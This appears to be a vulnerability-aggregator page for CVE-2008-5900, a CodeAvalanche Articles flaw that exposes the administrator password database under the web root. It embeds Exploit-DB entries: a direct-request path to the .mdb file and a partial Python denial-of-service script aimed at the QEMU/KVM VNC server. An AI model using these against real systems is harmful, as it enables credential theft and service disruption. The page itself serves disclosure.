CVE-2008-5900
published 2009-01-12CVE-2008-5900: CodeAvalanche Articles stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database…
PriorityP350high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
6.36%
92.8th percentile
CodeAvalanche Articles stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing the administrator password via a direct request for _private/CAArticles.mdb. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| codeavalanche | articles | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
QEMU 0.9 / KVM 36/79 - VNC Server Remote Denial of Service
exploitdb·2008-12-22
CVE-2008-2382 QEMU 0.9 / KVM 36/79 - VNC Server Remote Denial of Service
QEMU 0.9 / KVM 36/79 - VNC Server Remote Denial of Service
---
source: https://www.securityfocus.com/bid/32910/info
QEMU and KVM are prone to a remote denial-of-service vulnerability that affects the included VNC server.
Attackers can exploit this issue to create a denial-of-service condition.
The following are vulnerable:
QEMU 0.9.1 and prior
KVM-79 and prior
##
## vnc remote DoS
##
import socket
import time
import struct
import sys
if len(sys.argv)<3:
print "Usage: %s host port" % sys.argv[0]
exit(0)
host = sys.argv[1] # "127.0.0.1" # debian 4
port = int(sys.argv[2]) # 5900
s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,port))
# rec-send versions
srvversion = s.recv(100)
cliversion=srvversion
s.send(cliversion)
print "Server version: %s" % srvversion
#Sec
Exploit-DB
CodeAvalanche Articles - Database Disclosure
exploitdb·2008-12-15
CVE-2008-5900 CodeAvalanche Articles - Database Disclosure
CodeAvalanche Articles - Database Disclosure
---
#########################################################
Portal Name: CAArticles
Download : http://www.truecontent.info/codeavalanche/asp-articles-publishing-script.php
Author : Pouya_Server , [email protected]
Vulnerability : (DD)
#########################################################
[DD]:
http://site.com/[Path]/CAArticles/_private/CAArticles.mdb
# milw0rm.com [2008-12-15]
No writeups or analysis indexed.
http://secunia.com/advisories/33100http://securityreason.com/securityalert/4909https://exchange.xforce.ibmcloud.com/vulnerabilities/47351https://www.exploit-db.com/exploits/7471http://secunia.com/advisories/33100http://securityreason.com/securityalert/4909https://exchange.xforce.ibmcloud.com/vulnerabilities/47351https://www.exploit-db.com/exploits/7471
2009-01-12
Published